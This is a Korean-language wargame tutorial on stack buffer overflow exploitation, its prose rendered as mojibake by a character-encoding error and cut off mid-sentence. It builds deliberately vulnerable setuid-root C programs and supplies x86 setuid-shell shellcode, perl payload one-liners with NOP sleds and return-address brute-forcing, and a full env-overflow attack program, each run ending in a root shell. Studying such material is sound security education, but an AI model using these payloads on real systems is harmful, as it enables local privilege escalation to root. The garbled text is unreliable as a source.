1581, 78/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¼ÒÀ¯
   http://soyu.cafe2.net
   Overflow °ø°Ý ±â¹ýµé¿¡ ´ëÇÑ Á¤¸® by ¹ö½ºÆ®

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=212 [º¹»ç]


/*

homepage: http://beist.org
e-mail: beist@hanmail.net
msn: beist@hotmail.com

beist¿Í °ü·ÃµÈ »çÀÌÆ® :
http://wowhacker.com (wowcode at wowhacker team)
http://hackerschool.org (very good hacking portal site)

*/


- ¸ñÂ÷ -

0. ¼Ò°³
1. big buffer overflow
2. small buffer overflow
3. ¿©·¯°¡Áö ±â¹ýµé

3-1. egghunter
3-2. argv[0] strcpy
3-3. strcat

4. env overflow
5. ¶ó¸¶±×¶ó ¹öÀü #1
6. ¶ó¸¶±×¶ó ¹öÀü #2
7. frame pointer
8. integer overflow
9. ±âŸ overflow ¹æ¹ý (±ÛÀ» ¸¶Ä¡¸é¼­)


Overflow °ø°Ý ±â¹ýµé¿¡ ´ëÇØ..


0. ¼Ò°³

¾È³çÇϼ¼¿ä? beist ÀÔ´Ï´Ù.

¿À´ÃÀº Overflow ¿¡ ´ëÇؼ­ ¾Ë¾Æº¸·Á ÇÕ´Ï´Ù. ÀÌ ¹®¼­¿¡¼­´Â Stack Overflow
±â¹ý¿¡ ´ëÇؼ­ ¼³¸íÇÒ °ÍÀÔ´Ï´Ù. ¹®¼­ÀÇ ¸ñÀûÀº Stack Overflow ÀÇ ¿¹Àü
¹æ½Äµé°ú ÇöÀç ±â¹ýµé¿¡ ´ëÇؼ­ ¹®¼­·Î Á¤¸®Çϴµ¥ ÀÖ½À´Ï´Ù.

ÀÌ °÷¿¡¼±, Overflow °ø°Ý ±â¹ý¿¡ ÇÊ¿äÇÑ ºÎ°¡ÀûÀÎ Áö½Ä¿¡ ´ëÇؼ­ ÀÚ¼¼È÷
´Ù·çÁö ¾ÊÀ» °ÍÀÔ´Ï´Ù. ¿¹¸¦ µç´Ù¸é, ShellCode Á¦ÀÛ ±â¹ý, Heap, Stack,
Data ¿µ¿ª µî ¸Þ¸ð¸® ±¸Á¶¿¡ ´ëÇؼ­ÀÇ ¼³¸í°°Àº °Íµé ¸»ÀÔ´Ï´Ù.

ºÎ°¡ÀûÀÎ Áö½Ä±îÁö ´Ù·ç±â¿¡´Â ¹®¼­°¡ ³Ê¹« ¹æ´ëÇØÁö°í, ±× ÁÖÁ¦µé¿¡ ´ëÇؼ­
µû·Î Á¤¸®µÇ¾î ÀÖ´Â ¹®¼­µéµµ ¸¹±â ¶§¹®ÀÔ´Ï´Ù. ±×·¸±â ¶§¹®¿¡ ÀÌ ¹®¼­¸¦ Àаí
ÀÌÇØÇϱâ À§Çؼ­´Â Overflow °ø°Ý ±â¹ý¿¡ ´ëÇÑ Áö½ÄÀÌ ¾î´À Á¤µµ °®Ãß¾îÁ®
ÀÖ¾î¾ß ÇÕ´Ï´Ù.

Overflow °ø°Ý ±â¹ýÀÌ ÀÎÅͳݿ¡ ¼Ò°³µÈÁöµµ ¿À·£ ½Ã°£ÀÌ Áö³µ½À´Ï´Ù. ±×¿¡
µû¶ó °ø°Ý ±â¹ýµéµµ ´Ù¾çÇÏ°Ô ³ª¿À°Ô µÇ¾ú´Âµ¥, ½¬¿î ÀÌÇظ¦ À§Çؼ­ °¢
±â¹ýµéÀ» ¼³¸íÇÒ ¶§ Wargame ¹®Á¦¸¦ ¸¸µé¾î¼­ ¼³¸íÇÏ°Ú½À´Ï´Ù. ÀÌ ¹®¼­¿¡¼­´Â
°¢ ¿µ¿ª¿¡ ¹«¾ùÀÌ µé¾î°¡ÀÖ´ÂÁö dump ¸¦ Çغ¸Áö ¾ÊÀ» °ÍÀÔ´Ï´Ù. ÀÌ·¯ÇÑ ÀÚ¼¼ÇÑ
»çÇ×Àº Á÷Á¢ Çغ¸½Ã°í, ¿©±â¼­´Â ¹®Á¦¸¦ Ǫ´Â °³³äÀûÀÎ ¹æ¹ý Á¤µµ¸¸ ¼³¸í
ÇÏ°Ú½À´Ï´Ù.

¿©±â¼­ ¼³¸íÇÏ´Â ±â¹ýµéÀÇ ÀϺδ ¸®¸ðÆ®¿¡¼­µµ ±×´ë·Î Àû¿ëµÇÁö¸¸, ¼³¸íÀ»
ÆíÇÏ°Ô Çϱâ À§ÇØ local ȯ°æÇÏ¿¡¼­ Å×½ºÆ®ÇÏ¿´½À´Ï´Ù.



1. ±âº»ÀûÀÎ Stack Overflow ( big buffer )

/* 1.c */

int main(int argc, char *argv[])
{
char buf[400];

if(argc==2)
strcpy(buf, argv[1]);
}


strcpy() ¿¡¼­ argv[1] À» buf ¿¡ copy Çϴµ¥, À̶§ °æ°è °Ë»ç¸¦ ÇÏÁö ¾Ê¾Æ¼­
overflow °¡ ÀϾ°Ô µË´Ï´Ù.

°ø°ÝÀÇ ±¸¼ºµµ¸¦ ¾Ë¾Æº¸°Ú½À´Ï´Ù. ¸Þ¸ð¸® ±¸Á¶´Â buf - sfp - ret °¡ µÉ °ÍÀÌ°í,
argv[1] ·Î buf ¿¡ copy ÇÕ´Ï´Ù.

°ø°ÝÀÇ ¼º°øµµ¸¦ ³ôÀ̱â À§ÇØ NOP (no operation) Äڵ带 ³õ°í, ±× µÚ¿¡ ½©ÄÚµå,
NOP, Return Address ÁÖ¼Ò¸¦ ³Ö½À´Ï´Ù. °¢°¢ÀÇ »çÀÌÁîÀÔ´Ï´Ù.

NOP - 352
SHELLCODE - 32
GARBAGE - 16
RETURN ADDRESS - 24


char shellcode[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";


[root@hacking doc]# gcc -o 1 1.c
[root@hacking doc]# chmod 6755 1

[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf4\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf5\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf6\xff\xbf"x6'`
Illegal instruction
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf7\xff\xbf"x6'`
sh-2.05b#


0xbffff724 ¿¡¼­ ½©ÀÌ ¶³¾îÁ³½À´Ï´Ù. Àú ºÎºÐÀº buf ¿µ¿ªÁßÀÇ NOP ÄÚµåÀÏ °ÍÀÔ´Ï´Ù.
ÀÚ¼¼ÇÑ ¿µ¿ª¿¡ ´ëÇؼ­´Â buf ¸¦ Á÷Á¢ ´ýÇÁÇغ¸½Ã±â ¹Ù¶ø´Ï´Ù.



2. ±âº»ÀûÀÎ stack overflow (small buffer)

/* 2.c */

int main(int argc, char *argv[])
{
char buf[4];

if(argc==2)
strcpy(buf, argv[1]);
}


1.c ¿Í °°Àº ¼Ò½ºÀÌÁö¸¸ buf ÀÇ Å©±â°¡ ´Ù¸¨´Ï´Ù. 1.c ¿¡¼­´Â buf ÀÇ Å©±â°¡ 400 ¹ÙÀÌÆ®
¶ó¼­, NOP, SHELLCODE µîÀ» ³Ö±â¿¡ ÃæºÐÇßÁö¸¸, 2.c ¿¡¼­´Â buf ÀÇ Å©±â°¡ 4 ¹ÙÀÌÆ®¹Û¿¡
µÇÁö ¾ÊÀ¸¹Ç·Î NOP À̳ª SHELLCODE µîÀ» ³ÖÀ» ¼ö°¡ ¾ø½À´Ï´Ù.

ÀÌ·² ¶§´Â ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÏ¿© °ø°ÝÀÌ °¡´ÉÇÕ´Ï´Ù. ȯ°æ º¯¼ö´Â stack ¿¡ Á¸ÀçÇÏ°í
Àִµ¥, ÀÓÀÇÀÇ È¯°æ º¯¼ö Çϳª¸¦ Àâ°í, ±× ¾È¿¡ SHELLCODE ¸¦ ³ÖÀº ÈÄ, 2.c ¸¦ °ø°Ý½Ã¿¡
return address ·Î ȯ°æ º¯¼öÀÇ ÁÖ¼Ò¸¦ ³ÖÀ¸¸é ½©À» ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù.


[root@hacking doc]# gcc -o 2 2.c
[root@hacking doc]# chmod 6755 2


BEIST ¶ó´Â ȯ°æ º¯¼ö¿¡ 400 ¹ÙÀÌÆ®ÀÇ NOP À» ³Ö°í, ±× µÚ¿¡ SHELLCODE ¸¦ ³Ö°Ú½À´Ï´Ù.



[beist@hacking doc]$ BEIST="`perl -e 'print \"\x90\"x400, \"\x31\xc0\x89\xc3\xb0
\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\x8d\x42\x0b\xcd\x80\"'`"
[beist@hacking doc]$ export BEIST


°ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.


[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf8\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf9\xff\xbf"x3'`
Illegal instruction
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfa\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfb\xff\xbf"x3'`
sh-2.05b# exit


0xbffffb24 ¿¡¼­ ½©À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. BEIST ȯ°æ º¯¼ö°¡ Àú À§Ä¡Âë¿¡ Á¸ÀçÇÒ
°ÍÀÌ°í, ¾Æ¸¶ ¿ì¸®°¡ Á¢±ÙÇÑ °÷Àº BEIST ȯ°æ º¯¼ö¿¡ ´ã±ä NOP ¿µ¿ªÀÏ °ÍÀÔ´Ï´Ù.



3. ¿©·¯°¡Áö overflow À¯Çüµé

(3) ¿¡¼­ ¼³¸íÇÏ´Â ±âº»ÀûÀÎ ¹æ¹ýÀº (1) °ú (2) ¿¡¼­ ¼³¸íÇß´ø ³»¿ë°ú ºñ½ÁÇÕ´Ï´Ù.
¿©·¯ °¡Áö »óȲµéÀ» ¿ö°ÔÀÓÀ¸·Î ¸¸µé¾î Ç®ÀÌ ¹æ¹ýÀ» ¼³¸íÇغ¸°Ú½À´Ï´Ù.


1) egghunter

À̹ø¿¡´Â egg hunter°¡ µé¾î°£ Ãë¾à ÇÁ·Î±×·¥À» °ø°ÝÇØ º¸°Ú½À´Ï´Ù. egg hunter´Â
egg shell, Áï ȯ°æ º¯¼ö¸¦ ¾ø¾ÖÁÖ´Â ±â´ÉÀ» ÇÕ´Ï´Ù. ȯ°æ º¯¼ö´Â Àü¿ªÀ¸·Î ¼±¾ð
µÇ¾îÀִµ¥, ÀÌ Àü¿ª ¼±¾ðµÈ environ À» memset() ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© ÃʱâÈ­¸¦
½Ãŵ´Ï´Ù.

±×·¡¼­, ȯ°æ º¯¼ö¿¡ SHELLCODE ¸¦ ³Ö°í, Ãë¾àÇÑ ÇÔ¼öÀÇ return address ¸¦ ȯ°æ
º¯¼öÀÇ ÁÖ¼Ò·Î ¹Ù²Ù¾îµµ, egghunter ¿¡ ÀÇÇØ È¯°æ º¯¼ö°¡ ÃʱâÈ­µÇ±â ¶§¹®¿¡,
ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇÒ ¼ö ¾ø½À´Ï´Ù.

¸¸¾à Ãë¾àÇÑ ÇÁ·Î±×·¥¿¡¼­ ÀÔ·ÂÇÒ ¼ö ÀÖ´Â buffer ÀÇ Å©±â°¡ ¿©À¯°¡ ÀÖ´Ù¸é, ±×
buffer ¾È¿¡ SHELLCODE ¸¦ ³Ö¾îµµ µÇ°ÚÁö¸¸ ±×·¸Áö ¸øÇÑ »óȲÀÏ ¶§´Â ȯ°æ º¯¼öµµ,
¹öÆÛµµ ¾Æ´Ñ ¾î¶² ÀÓÀÇÀÇ ¿µ¿ªÀ» ÀÌ¿ëÇÏ¿©¾ß ÇÕ´Ï´Ù. ¿©±â¼­´Â ȯ°æ º¯¼ö¿Í ¸¶Âù
°¡Áö·Î ½ºÅÃÀÇ ÀϺÎÀÎ argv ¸¦ ÀÌ¿ëÇÏ¿© ¹®Á¦¸¦ Ç®¾îº¸°Ú½À´Ï´Ù. ¹®Á¦´Â ´ÙÀ½°ú
°°½À´Ï´Ù.


/* 3-1.c */

extern char **environ;

void function(char *str)
{
char buf[4];

strncpy(buf, str, 12);
}

int main(int argc, char *argv[])
{

int egghunter;

for(egghunter=0; environ[egghunter]; egghunter++)
memset(environ[egghunter], 0, strlen(environ[egghunter]));

function(argv[1]);

}


¹®Á¦ ¼³Ä¡¸¦ ÇÏ°í °ø°ÝÀ» Çغ¸°Ú½À´Ï´Ù.


[root@beist doc]# gcc -o 3-1 3-1.c
[root@beist doc]# chmod 6755 3-1


°ø°ÝÀ» ½ÃµµÇÒ ¶§, argv[1] ´Â, ¿ì¸®°¡ µ¹¾Æ°¥ return address ¸¦ °¡¸£ÄÑ¾ß ÇÕ´Ï´Ù.
¿ì¸®ÀÇ SHELLCODE ´Â argv[2] ¿µ¿ª¿¡ ³õÀ» °ÍÀÌ´Ï, argv[1] ´Â argv[2] À» °¡¸£ÄѾß
ÇÕ´Ï´Ù.


[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf8\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf9\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfa\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction

[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfb\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#


0xbffffb24 ¿¡¼­ shell À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. argv[2] ¿¡´Â NOP Äڵ带 400 ¹ÙÀÌÆ®¸¦
³Ö¾îµÎ¾ú°í, ±× µÚ¿¡ SHELLCODE ¸¦ ³Ö¾ú½À´Ï´Ù.



2) argv[0] strcpy

À̹ø¿¡´Â ¿ø¸®´Â °°Áö¸¸ Á¶±Ý ´Ù¸¥ ¹æ¹ýÀ¸·Î Ç®À̸¦ ÇؾßÇÏ´Â ¹®Á¦ÀÔ´Ï´Ù. ¹Ù·Î argv[0]
ÀÚü¸¦ buffer ¿¡ strcpy() ÇÏ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. ±âº»ÀûÀÎ overflow ¹®Á¦¿Í ÀüÇô ´Ù¸¦
°ÍÀÌ ¾øÁö¸¸ argv[0] À» ¾î¶»°Ô ¹Ù²Ù´À³Ä°¡ Áß¿äÇÕ´Ï´Ù. argv[0] Àº ÇÁ·Î±×·¥ À̸§À»
¶æÇÕ´Ï´Ù. ÇÏµå ¸µÅ©, ½Éº¼¸¯ ¸µÅ©, exec ÇÔ¼ö±ºµéÀ» ÀÌ¿ëÇÏ¿© argv[0] ¹Ù²Ù±â, µî ¿©·¯
°¡Áö ¹æ¹ýÀ¸·Î argv[0] À» Á¶ÀÛÇÒ ¼ö Àִµ¥, ¿©±â¼­´Â °¡Àå °£ÆíÇÑ ¹æ¹ýÀÎ ½Éº¼¸¯
¸µÅ©¸¦ ÀÌ¿ëÇÑ ¹æ¹ýÀ» ¼Ò°³ÇÏ°Ú½À´Ï´Ù.


/* 3-2.c */

int main(int argc, char *argv[])
{
char buf[10];

strcpy(buf,argv[0]);
}


¹®Á¦¸¦ ¼³Ä¡ÇÏ°Ú½À´Ï´Ù.


[root@beist doc]# gcc -o 3-2 3-2.c
[root@beist doc]# chmod 6755 3-2

½Éº¼¸¯ ¸µÅ©¸¦ ÀÌ¿ëÇÏ¿© argv[0] À» ¹Ù²Ù°Ú½À´Ï´Ù. ¿©±â¼­´Â, argv[0] ¿¡´Â ´Ü¼øÈ÷
return address ¸¸À» ÁöÁ¤ÇÏ°í, SHELLCODE ´Â, argv[1] ¿¡ ³õ°Ú½À´Ï´Ù. ±×·¯¹Ç·Î
argv[0] Àº argv[1] À» °¡¸£Å°°Ô ÇÏ¸é µÉ °ÍÀÔ´Ï´Ù.


[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xf9\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xf9\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction

[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfa\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfa\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfb\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfb\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#


return address °¡ 0xbffffb24 ¿¡¼­ ¶³¾îÁø °ÍÀ¸·Î º¸¾Æ, SHELLCODE °¡ ´ã±ä
argv[1] ÀÌ ±× ¿µ¿ªÀÓÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù. ÇÁ·Î±×·¥À» ½ÇÇà½Ãų ¶§, ¾Õ¿¡ "./" °¡
¾Æ´Ñ ".///" ¸¦ ³Ö¾îÁØ ÀÌÀ¯´Â, ¿öµå ´ÜÀ§¸¦ 4 ¹ÙÀÌÆ®·Î ¸ÂÃçÁÖ±â À§ÇÔÀÔ´Ï´Ù.


3) strcat overflow

strcat ÀÇ overflow µµ ´Ù¸¥ ÀϹÝÀûÀÎ overflow ¿Í Â÷ÀÌÁ¡ÀÌ ¾ø½À´Ï´Ù. ÇÔ¼öÀÇ return
address ¿µ¿ªÀ» µ¤¾î¼­ °ø°ÝÇÑ´Ù´Â, °ø°Ý ¹æ¹ýÀº °°½À´Ï´Ù.


3-3.c

void function(char *str)
{
char buf[4]={0};

strcat(buf, str);
}

main(int argc, char *argv[])
{

if(argc == 2)
function(argv[1]);

}


[root@hacking doc]# gcc -o 3-3 3-3.c
[root@hacking doc]# chmod 6755 3-3


ÇöÀç 3-3 ÇÁ·Î±×·¥ÀÇ buffer »óÅ´ ´ÙÀ½°ú °°½À´Ï´Ù.

[ buf ] [ sfp ] [ ret ] [ ±âŸ¿µ¿ª ]

¿©±â¼­´Â, ±âŸ¿µ¿ª¿¡ NOP ÄÚµå¿Í ½©Äڵ带 ³Ö°í, ret ¿µ¿ªÀº, ±âŸ ¿µ¿ªÀ» °¡¸£Å°°Ô ÇÏ´Â
¹æ¹ýÀ¸·Î °ø°ÝÀ» Çغ¸°Ú½À´Ï´Ù.


[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf5\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf6\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf7\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault

[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf8\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05b#


4 ¹ø° °ø°Ý¿¡¼­ ½©À» µþ ¼ö ÀÖ¾ú½À´Ï´Ù.


4. env overflow

env overflow ±â¹ýÀº, murat@underunix.org ¶ó´Â ¿Ü±¹ÀÇ ÇØÄ¿¿¡ ÀÇÇؼ­ ¼Ò°³µÈ ¹Ù°¡
ÀÖ½À´Ï´Ù. ±âÁ¸ÀÇ stack overflow °ø°Ý ±â¹ý°ú´Â Á¶±Ý ´Ù¸¥ ¹æ¹ýÀ¸·Î Á¢±ÙÀ» Çϴµ¥,
±âÁ¸ÀÇ °ø°Ý ±â¹ýµéÀº, ¾î´À Á¤µµÀÇ °ø°Ý ½Ãµµ¸¦ °ÅÃļ­ ¿ì¸®°¡ ³ÖÀº ½©Äڵ忡 Á¢±ÙÀ»
Çϴµ¥ ºñÇØ, env overflow Àº NOP Äڵ带 ³õ°í, ¿É¼ÂÀ» Âï¾î¸ÂÃß´Â °æ¿ì¿Í´Â ´Ù¸¥
¹æ¹ýÀ¸·Î one shot ¿¡ ¼º°øÀ» ÇÒ ¼ö ÀÖ´Â ÀåÁ¡ÀÌ ÀÖ½À´Ï´Ù.

env overflow ÀÇ °ø°Ý ÇÙ½ÉÀº ´ÙÀ½°ú °°½À´Ï´Ù. ÀÌ ¹æ¹ý¿¡ ´ëÇÑ ´õ ÀÚ¼¼ÇÑ »çÇ×Àº
wowhacker lecture °Ô½ÃÆÇ¿¡ ¿Ã·ÁÁø Buffer overflow Demystified ¶õ ±ÛÀ» Âü°íÇØ
º¸¼¼¿ä.

ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÉ ¶§ ¿ì¸®ÀÇ ½ºÅÃÀº ´ÙÀ½°ú °°½À´Ï´Ù.

0xbfffffff - ½ºÅÃÀÇ top
4 byte - (NULL byte)
strlen(ÇÁ·Î±×·¥À̸§) - program_name ±æÀÌ
1 byte - program_name ÀÇ null ¹ÙÀÌÆ®
strlen(ȯ°æº¯¼ö) - ¸¶Áö¸· ȯ°æ º¯¼ö ¹®ÀÚ¿­

±×·¸´Ù¸é, envp ÀÇ À§Ä¡´Â ´ÙÀ½°ú °°ÀÌ µÉ °ÍÀÔ´Ï´Ù.

envp = 0xbffffffa - strlen(program_name) - strlen(envp)

À§ÀÇ °è»ê´ë·Î¶ó¸é, envp ¿¡ shellcode ¸¦ ³õ°í, envp °¡ ½ÃÀÛµÉ À§Ä¡ÀÇ ÁÖ¼Ò·Î Ãë¾àÇÑ
ÇÁ·Î±×·¥ÀÇ buffer ¸¦ µ¤¾î¾²°í, ±×´ë·Î return address ¸¦ µ¤¾î¾º¿ì¸é ¿ì¸®´Â ½©À»
¾òÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù.

±×·±µ¥ °ø°Ý ½Ã¿¡, ´Ù¸¥ ȯ°æ º¯¼öµéÀÌ Á¸ÀçÇÑ´Ù¸é ȯ°æ º¯¼ö¸¦ °è»êÇϱⰡ Á¶±Ý
ºÒÆíÇØÁö¹Ç·Î, C ÇÁ·Î±×·¥À» ÀÛ¼ºÇÏ¿© ´Ù¸¥ ȯ°æ º¯¼ö´Â ¸ðµÎ Áö¿î ÈÄ, °ø°ÝÀ» ½Ãµµ
Çغ¸°Ú½À´Ï´Ù.


Ãë¾àÁ¡À» °¡Áø wargame ¼Ò½º´Â ´ÙÀ½°ú °°½À´Ï´Ù.


/bof/doc/4.c

void function(char *str)
{
char buf[4];

strncpy(buf, str, 20);
}

int main(int argc, char *argv[])
{
if(argc == 2)
function(argv[1]);
}


[root@hacking doc]# gcc -o 4 4.c
[root@hacking doc]# chmod 6755 4


Ãë¾àÇÑ ¼Ò½ºÀÇ buffer ´Â ´ÙÀ½°ú °°½À´Ï´Ù.

[ buf ] [ sfp ] [ ret ]

¿ì¸®´Â ret ÀÇ ÁÖ¼Ò¸¦ ½©Äڵ尡 ³õÀÎ envp ÀÇ ÁÖ¼Ò·Î °¡¸£Å°°Ô ÇÒ °ÍÀÔ´Ï´Ù. ±×·¯·Á¸é
buf, sfp, ret ¸¦ µ¤À» ¼ö ÀÖ´Â Å©±âÀÎ 12 ¹ÙÀÌÆ®¸¦ argv[1] ·Î ÁöÁ¤ÇÏ°í ½ÇÇàÇؾß
ÇÕ´Ï´Ù.

´ÙÀ½Àº °ø°Ý ¼Ò½ºÀÔ´Ï´Ù.


/bof/doc/4-attack.c

#include <stdio.h>

char sc[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x6
2\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

main()
{
char *env[3] = {sc, NULL};
char buf[12];

int *a=(int *)(buf);

int ret=0xbffffffa - strlen(sc) - strlen("/bof/doc/4");

*a++ = ret;
*a++ = ret;
*a++ = ret;

execle("/bof/doc/4", "4", buf, NULL, env);
}


À§ÀÇ °æ¿ì¿¡ ret ´Â 0xbfffffd0 À¸·Î °è»êµÉ °ÍÀÌ°í, buf ´Â 0xbfffffd0 À¸·Î 12 ¹ÙÀÌÆ®
ÀÌ»óÀ» ÀÌ·ç¾îÁøÈÄ, execle() ÇÔ¼ö·Î ÀÎÇØ buf °¡ argv[1] ·Î µé¾î°¡°Ô µË´Ï´Ù. ±×·¸´Ù¸é
/bof/doc/4 ÀÇ return address ´Â 0xbfffffd0 ÀÌ µÉ °ÍÀÌ°í, 0xbfffffd0 Àº ½©Äڵ尡
³õÀÎ ÁÖ¼ÒÀ̹ǷÎ, ¿ì¸®´Â ½©À» ¾òÀ» ¼ö ÀÖ½À´Ï´Ù.


[beist@hacking doc]$ gcc -o 4-attack 4-attack.c
[beist@hacking doc]$ ./4-attack
sh-2.05b# id
uid=0(root) gid=500(beist) groups=500(beist)


¼º°øÀûÀ¸·Î root shell À» ¾òÀ» ¼ö ÀÖ¾ú½À´Ï´Ù. env overflow ¹æ½ÄÀº, ´Ü Çѹø¿¡
root shell À» ȹµæÇÒ ¼ö ÀÖ´Ù´Â ÀåÁ¡ÀÌ ÀÖÁö¸¸, ȯ°æ º¯¼ö¸¦ ÀÌ¿ëÇϹǷΠlocal ¿¡¼­¸¸
ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù´Â ´ÜÁ¡ÀÌ ÀÖ½À´Ï´Ù. ¶ÇÇÑ, ¾îÂ÷ÇÇ È¯°æ º¯¼ö¸¦ ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù¸é,
±»ÀÌ env overflow ¸¦ ÀÌ¿ëÇÏÁö ¾Ê´õ¶óµµ, ´õ ÆíÇÑ ¹æ¹ýÀÌ ¸¹À¸¹Ç·Î ÀÌ ±â¹ýÀº
